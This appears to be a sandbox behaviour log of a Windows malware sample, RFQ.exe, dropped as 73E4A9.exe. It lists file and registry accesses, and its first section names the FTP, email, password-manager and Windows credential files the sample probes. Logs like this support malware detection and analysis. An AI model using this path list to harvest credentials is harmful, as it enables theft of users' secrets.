C:\Users\Seven01\Documents\*.bscp
C:\Users\Seven01\Documents\*.vnc
C:\Users\Seven01\Desktop\*.vnc
C:\Users\Seven01\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml
C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini
C:\Users\Seven01\Documents\Pocomail\accounts.ini
C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\Seven01\Documents\*Mailbox.ini
C:\Users\Seven01\Documents\yMail2\POP3.xml
C:\Users\Seven01\Documents\yMail2\SMTP.xml
C:\Users\Seven01\Documents\yMail2\Accounts.xml
C:\Users\Seven01\Documents\yMail\ymail.ini
C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\Seven01\Documents\*.spn
C:\Users\Seven01\Desktop\*.spn
C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\Seven01\AppData\Roaming\stickies\images
C:\Users\Seven01\AppData\Roaming\stickies\rtf
C:\Users\Seven01\AppData\Roaming\NoteFly\notes
C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\Seven01\Documents
C:\Users\Seven01\Documents\*.kdbx
C:\Users\Seven01\Desktop
C:\Users\Seven01\Desktop\*.kdbx
C:\Users\Seven01\Documents\*.kdb
C:\Users\Seven01\Desktop\*.kdb
C:\Users\Seven01\Documents\Enpass
C:\Users\Seven01\Documents\My RoboForm Data
C:\Users\Seven01\Documents\1Password
C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox
C:\Users\Seven01\AppData\Local\Temp\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Users\Seven01\AppData\Local\Temp\netutils.dll
C:\Windows\System32\netutils.dll
C:\Users\Seven01\AppData\Local\Temp\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Local\Microsoft\Credentials
C:\Users\Seven01\AppData\Local\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp
C:\Windows\ServiceProfiles
C:\Windows\ServiceProfiles\LocalService
C:\Windows\sysnative\Tasks\Microsoft\Windows\WDI\ResolutionHost
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
C:\Windows\Fonts\arial.ttf
C:\Windows\Fonts\ariali.ttf
C:\Windows\Fonts\arialbd.ttf
C:\Windows\Fonts\arialbi.ttf
C:\Windows\Fonts\batang.ttc
C:\Windows\Fonts\cour.ttf
C:\Windows\Fonts\couri.ttf
C:\Windows\Fonts\courbd.ttf
C:\Windows\Fonts\courbi.ttf
C:\Windows\Fonts\daunpenh.ttf
C:\Windows\Fonts\dokchamp.ttf
C:\Windows\Fonts\estre.ttf
C:\Windows\Fonts\euphemia.ttf
C:\Windows\Fonts\gautami.ttf
C:\Windows\Fonts\gautamib.ttf
C:\Windows\Fonts\Vani.ttf
C:\Windows\Fonts\Vanib.ttf
C:\Windows\Fonts\gulim.ttc
C:\Windows\Fonts\impact.ttf
C:\Windows\Fonts\iskpota.ttf
C:\Windows\Fonts\iskpotab.ttf
C:\Windows\Fonts\kalinga.ttf
C:\Windows\Fonts\kalingab.ttf
C:\Windows\Fonts\kartika.ttf
C:\Windows\Fonts\kartikab.ttf
C:\Windows\Fonts\KhmerUI.ttf
C:\Windows\Fonts\KhmerUIb.ttf
C:\Windows\Fonts\LaoUI.ttf
C:\Windows\Fonts\LaoUIb.ttf
C:\Windows\Fonts\latha.ttf
C:\Windows\Fonts\lathab.ttf
C:\Windows\Fonts\lucon.ttf
C:\Windows\Fonts\malgun.ttf
C:\Windows\Fonts\malgunbd.ttf
C:\Windows\Fonts\mangal.ttf
C:\Windows\Fonts\mangalb.ttf
C:\Windows\Fonts\meiryo.ttc
C:\Windows\Fonts\meiryob.ttc
C:\Windows\Fonts\himalaya.ttf
C:\Windows\Fonts\msjh.ttf
C:\Windows\Fonts\msjhbd.ttf
C:\Windows\Fonts\msyh.ttf
C:\Windows\Fonts\msyhbd.ttf
C:\Windows\Fonts\mingliu.ttc
C:\Windows\Fonts\mingliub.ttc
C:\Windows\Fonts\monbaiti.ttf
C:\Windows\Fonts\msgothic.ttc
C:\Windows\Fonts\msmincho.ttc
C:\Windows\Fonts\mvboli.ttf
C:\Windows\Fonts\ntailu.ttf
C:\Windows\Fonts\ntailub.ttf
C:\Windows\Fonts\nyala.ttf
C:\Windows\Fonts\phagspa.ttf
C:\Windows\Fonts\phagspab.ttf
C:\Windows\Fonts\plantc.ttf
C:\Windows\Fonts\raavi.ttf
C:\Windows\Fonts\raavib.ttf
C:\Windows\Fonts\segoesc.ttf
C:\Windows\Fonts\segoescb.ttf
C:\Windows\Fonts\segoeui.ttf
C:\Windows\Fonts\segoeuib.ttf
C:\Windows\Fonts\segoeuii.ttf
C:\Windows\Fonts\segoeuiz.ttf
C:\Windows\Fonts\seguisb.ttf
C:\Windows\Fonts\segoeuil.ttf
C:\Windows\Fonts\seguisym.ttf
C:\Windows\Fonts\shruti.ttf
C:\Windows\Fonts\shrutib.ttf
C:\Windows\Fonts\simsun.ttc
C:\Windows\Fonts\simsunb.ttf
C:\Windows\Fonts\sylfaen.ttf
C:\Windows\Fonts\taile.ttf
C:\Windows\Fonts\taileb.ttf
C:\Windows\Fonts\times.ttf
C:\Windows\Fonts\timesi.ttf
C:\Windows\Fonts\timesbd.ttf
C:\Windows\Fonts\timesbi.ttf
C:\Windows\Fonts\tunga.ttf
C:\Windows\Fonts\tungab.ttf
C:\Windows\Fonts\vrinda.ttf
C:\Windows\Fonts\vrindab.ttf
C:\Windows\Fonts\Shonar.ttf
C:\Windows\Fonts\Shonarb.ttf
C:\Windows\Fonts\msyi.ttf
C:\Windows\Fonts\tahoma.ttf
C:\Windows\Fonts\tahomabd.ttf
C:\Windows\Fonts\micross.ttf
C:\Windows\Fonts\angsa.ttf
C:\Windows\Fonts\angsai.ttf
C:\Windows\Fonts\angsab.ttf
C:\Windows\Fonts\angsaz.ttf
C:\Windows\Fonts\aparaj.ttf
C:\Windows\Fonts\aparajb.ttf
C:\Windows\Fonts\aparajbi.ttf
C:\Windows\Fonts\aparaji.ttf
C:\Windows\Fonts\cordia.ttf
C:\Windows\Fonts\cordiai.ttf
C:\Windows\Fonts\cordiab.ttf
C:\Windows\Fonts\cordiaz.ttf
C:\Windows\Fonts\ebrima.ttf
C:\Windows\Fonts\ebrimabd.ttf
C:\Windows\Fonts\gisha.ttf
C:\Windows\Fonts\gishabd.ttf
C:\Windows\Fonts\kokila.ttf
C:\Windows\Fonts\kokilab.ttf
C:\Windows\Fonts\kokilabi.ttf
C:\Windows\Fonts\kokilai.ttf
C:\Windows\Fonts\leelawad.ttf
C:\Windows\Fonts\leelawdb.ttf
C:\Windows\Fonts\msuighur.ttf
C:\Windows\Fonts\moolbor.ttf
C:\Windows\Fonts\symbol.ttf
C:\Windows\Fonts\utsaah.ttf
C:\Windows\Fonts\utsaahb.ttf
C:\Windows\Fonts\utsaahbi.ttf
C:\Windows\Fonts\utsaahi.ttf
C:\Windows\Fonts\vijaya.ttf
C:\Windows\Fonts\vijayab.ttf
C:\Windows\Fonts\wingding.ttf
C:\Windows\Fonts\modern.fon
C:\Windows\Fonts\roman.fon
C:\Windows\Fonts\script.fon
C:\Windows\Fonts\andlso.ttf
C:\Windows\Fonts\arabtype.ttf
C:\Windows\Fonts\simpo.ttf
C:\Windows\Fonts\simpbdo.ttf
C:\Windows\Fonts\simpfxo.ttf
C:\Windows\Fonts\majalla.ttf
C:\Windows\Fonts\majallab.ttf
C:\Windows\Fonts\trado.ttf
C:\Windows\Fonts\tradbdo.ttf
C:\Windows\Fonts\ahronbd.ttf
C:\Windows\Fonts\david.ttf
C:\Windows\Fonts\davidbd.ttf
C:\Windows\Fonts\frank.ttf
C:\Windows\Fonts\lvnm.ttf
C:\Windows\Fonts\lvnmbd.ttf
C:\Windows\Fonts\mriam.ttf
C:\Windows\Fonts\mriamc.ttf
C:\Windows\Fonts\nrkis.ttf
C:\Windows\Fonts\rod.ttf
C:\Windows\Fonts\simfang.ttf
C:\Windows\Fonts\simhei.ttf
C:\Windows\Fonts\simkai.ttf
C:\Windows\Fonts\angsau.ttf
C:\Windows\Fonts\angsaui.ttf
C:\Windows\Fonts\angsaub.ttf
C:\Windows\Fonts\angsauz.ttf
C:\Windows\Fonts\browa.ttf
C:\Windows\Fonts\browai.ttf
C:\Windows\Fonts\browab.ttf
C:\Windows\Fonts\browaz.ttf
C:\Windows\Fonts\browau.ttf
C:\Windows\Fonts\browaui.ttf
C:\Windows\Fonts\browaub.ttf
C:\Windows\Fonts\browauz.ttf
C:\Windows\Fonts\cordiau.ttf
C:\Windows\Fonts\cordiaub.ttf
C:\Windows\Fonts\cordiauz.ttf
C:\Windows\Fonts\cordiaui.ttf
C:\Windows\Fonts\upcdl.ttf
C:\Windows\Fonts\upcdi.ttf
C:\Windows\Fonts\upcdb.ttf
C:\Windows\Fonts\upcdbi.ttf
C:\Windows\Fonts\upcel.ttf
C:\Windows\Fonts\upcei.ttf
C:\Windows\Fonts\upceb.ttf
C:\Windows\Fonts\upcebi.ttf
C:\Windows\Fonts\upcfl.ttf
C:\Windows\Fonts\upcfi.ttf
C:\Windows\Fonts\upcfb.ttf
C:\Windows\Fonts\upcfbi.ttf
C:\Windows\Fonts\upcil.ttf
C:\Windows\Fonts\upcii.ttf
C:\Windows\Fonts\upcib.ttf
C:\Windows\Fonts\upcibi.ttf
C:\Windows\Fonts\upcjl.ttf
C:\Windows\Fonts\upcji.ttf
C:\Windows\Fonts\upcjb.ttf
C:\Windows\Fonts\upcjbi.ttf
C:\Windows\Fonts\upckl.ttf
C:\Windows\Fonts\upcki.ttf
C:\Windows\Fonts\upckb.ttf
C:\Windows\Fonts\upckbi.ttf
C:\Windows\Fonts\upcll.ttf
C:\Windows\Fonts\upcli.ttf
C:\Windows\Fonts\upclb.ttf
C:\Windows\Fonts\upclbi.ttf
C:\Windows\Fonts\kaiu.ttf
C:\Windows\Fonts\l_10646.ttf
C:\Windows\Fonts\ariblk.ttf
C:\Windows\Fonts\calibri.ttf
C:\Windows\Fonts\calibrii.ttf
C:\Windows\Fonts\calibrib.ttf
C:\Windows\Fonts\calibriz.ttf
C:\Windows\Fonts\cambria.ttc
C:\Windows\Fonts\cambriai.ttf
C:\Windows\Fonts\cambriab.ttf
C:\Windows\Fonts\cambriaz.ttf
C:\Windows\Fonts\Candara.ttf
C:\Windows\Fonts\Candarai.ttf
C:\Windows\Fonts\Candarab.ttf
C:\Windows\Fonts\Candaraz.ttf
C:\Windows\Fonts\comic.ttf
C:\Windows\Fonts\comicbd.ttf
C:\Windows\Fonts\consola.ttf
C:\Windows\Fonts\consolai.ttf
C:\Windows\Fonts\consolab.ttf
C:\Windows\Fonts\consolaz.ttf
C:\Windows\Fonts\constan.ttf
C:\Windows\Fonts\constani.ttf
C:\Windows\Fonts\constanb.ttf
C:\Windows\Fonts\constanz.ttf
C:\Windows\Fonts\corbel.ttf
C:\Windows\Fonts\corbeli.ttf
C:\Windows\Fonts\corbelb.ttf
C:\Windows\Fonts\corbelz.ttf
C:\Windows\Fonts\framd.ttf
C:\Windows\Fonts\framdit.ttf
C:\Windows\Fonts\Gabriola.ttf
C:\Windows\Fonts\georgia.ttf
C:\Windows\Fonts\georgiai.ttf
C:\Windows\Fonts\georgiab.ttf
C:\Windows\Fonts\georgiaz.ttf
C:\Windows\Fonts\pala.ttf
C:\Windows\Fonts\palai.ttf
C:\Windows\Fonts\palab.ttf
C:\Windows\Fonts\palabi.ttf
C:\Windows\Fonts\segoepr.ttf
C:\Windows\Fonts\segoeprb.ttf
C:\Windows\Fonts\trebuc.ttf
C:\Windows\Fonts\trebucit.ttf
C:\Windows\Fonts\trebucbd.ttf
C:\Windows\Fonts\trebucbi.ttf
C:\Windows\Fonts\verdana.ttf
C:\Windows\Fonts\verdanai.ttf
C:\Windows\Fonts\verdanab.ttf
C:\Windows\Fonts\verdanaz.ttf
C:\Windows\Fonts\webdings.ttf
C:\Windows\Fonts\coure.fon
C:\Windows\Fonts\serife.fon
C:\Windows\Fonts\sserife.fon
C:\Windows\Fonts\smalle.fon
C:\Windows\Fonts\smallf.fon
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\EQUATION\MTEXTRA.TTF
C:\Windows\Fonts\ARIALUNI.TTF
C:\Windows\Fonts\CENTURY.TTF
C:\Windows\Fonts\WINGDNG2.TTF
C:\Windows\Fonts\WINGDNG3.TTF
C:\Windows\Fonts\BKANT.TTF
C:\Windows\Fonts\GOTHIC.TTF
C:\Windows\Fonts\OUTLOOK.TTF
C:\Windows\Fonts\TEMPSITC.TTF
C:\Windows\Fonts\MISTRAL.TTF
C:\Windows\Fonts\LHANDW.TTF
C:\Windows\Fonts\ITCKRIST.TTF
C:\Windows\Fonts\JUICE___.TTF
C:\Windows\Fonts\FREESCPT.TTF
C:\Windows\Fonts\ARIALN.TTF
C:\Windows\Fonts\GARA.TTF
C:\Windows\Fonts\MTCORSVA.TTF
C:\Windows\Fonts\ALGER.TTF
C:\Windows\Fonts\BASKVILL.TTF
C:\Windows\Fonts\BAUHS93.TTF
C:\Windows\Fonts\BELL.TTF
C:\Windows\Fonts\BRLNSB.TTF
C:\Windows\Fonts\BERNHC.TTF
C:\Windows\Fonts\BOD_PSTC.TTF
C:\Windows\Fonts\BRITANIC.TTF
C:\Windows\Fonts\BROADW.TTF
C:\Windows\Fonts\BRUSHSCI.TTF
C:\Windows\Fonts\CALIFR.TTF
C:\Windows\Fonts\CENTAUR.TTF
C:\Windows\Fonts\CHILLER.TTF
C:\Windows\Fonts\COLONNA.TTF
C:\Windows\Fonts\COOPBL.TTF
C:\Windows\Fonts\FTLTLT.TTF
C:\Windows\Fonts\HARLOWSI.TTF
C:\Windows\Fonts\HARNGTON.TTF
C:\Windows\Fonts\HTOWERT.TTF
C:\Windows\Fonts\JOKERMAN.TTF
C:\Windows\Fonts\KUNSTLER.TTF
C:\Windows\Fonts\LBRITE.TTF
C:\Windows\Fonts\LCALLIG.TTF
C:\Windows\Fonts\LFAX.TTF
C:\Windows\Fonts\MAGNETOB.TTF
C:\Windows\Fonts\MATURASC.TTF
C:\Windows\Fonts\MOD20.TTF
C:\Windows\Fonts\NIAGENG.TTF
C:\Windows\Fonts\NIAGSOL.TTF
C:\Windows\Fonts\OLDENGL.TTF
C:\Windows\Fonts\ONYX.TTF
C:\Windows\Fonts\PARCHM.TTF
C:\Windows\Fonts\PLAYBILL.TTF
C:\Windows\Fonts\POORICH.TTF
C:\Windows\Fonts\RAVIE.TTF
C:\Windows\Fonts\INFROMAN.TTF
C:\Windows\Fonts\SHOWG.TTF
C:\Windows\Fonts\SNAP____.TTF
C:\Windows\Fonts\STENCIL.TTF
C:\Windows\Fonts\VINERITC.TTF
C:\Windows\Fonts\VIVALDII.TTF
C:\Windows\Fonts\VLADIMIR.TTF
C:\Windows\Fonts\LATINWD.TTF
C:\Windows\Fonts\BOOKOS.TTF
C:\Windows\Fonts\ANTQUAB.TTF
C:\Windows\Fonts\ANTQUABI.TTF
C:\Windows\Fonts\ANTQUAI.TTF
C:\Windows\Fonts\GOTHICB.TTF
C:\Windows\Fonts\GOTHICBI.TTF
C:\Windows\Fonts\GOTHICI.TTF
C:\Windows\Fonts\BSSYM7.TTF
C:\Windows\Fonts\REFSAN.TTF
C:\Windows\Fonts\REFSPCL.TTF
C:\Windows\Fonts\ARIALNB.TTF
C:\Windows\Fonts\ARIALNBI.TTF
C:\Windows\Fonts\ARIALNI.TTF
C:\Windows\Fonts\GARABD.TTF
C:\Windows\Fonts\GARAIT.TTF
C:\Windows\Fonts\BELLB.TTF
C:\Windows\Fonts\BELLI.TTF
C:\Windows\Fonts\BRLNSDB.TTF
C:\Windows\Fonts\BRLNSR.TTF
C:\Windows\Fonts\CALIFB.TTF
C:\Windows\Fonts\CALIFI.TTF
C:\Windows\Fonts\HTOWERTI.TTF
C:\Windows\Fonts\LBRITED.TTF
C:\Windows\Fonts\LBRITEDI.TTF
C:\Windows\Fonts\LBRITEI.TTF
C:\Windows\Fonts\LFAXD.TTF
C:\Windows\Fonts\LFAXDI.TTF
C:\Windows\Fonts\LFAXI.TTF
C:\Windows\Fonts\BOOKOSB.TTF
C:\Windows\Fonts\BOOKOSBI.TTF
C:\Windows\Fonts\BOOKOSI.TTF
C:\Windows\Fonts\marlett.ttf
\??\PIPE\wkssvc
C:\Windows\sysnative\winevt\Logs\System.evtx
C:\Windows\sysnative\RacEngn.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx
C:\Windows\sysnative\radarrs.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx
C:\Windows\sysnative\it-IT\radarrs.dll.mui

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\RFQ.exe.config
C:\Users\Seven01\AppData\Local\Temp\RFQ.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol28.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
C:\Windows\Fonts\modern.fon
C:\Windows\Fonts\roman.fon
C:\Windows\Fonts\script.fon
C:\Windows\Fonts\coure.fon
C:\Windows\Fonts\serife.fon
C:\Windows\Fonts\sserife.fon
C:\Windows\Fonts\smalle.fon
C:\Windows\Fonts\smallf.fon
\??\PIPE\wkssvc
C:\Windows\sysnative\RacEngn.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx
C:\Windows\sysnative\radarrs.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx
C:\Windows\sysnative\it-IT\radarrs.dll.mui

C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
\??\PIPE\wkssvc
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2692.32534109
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2692.32534125
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2692.32534312
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Local\Temp\RFQ.exe

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RFQ.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
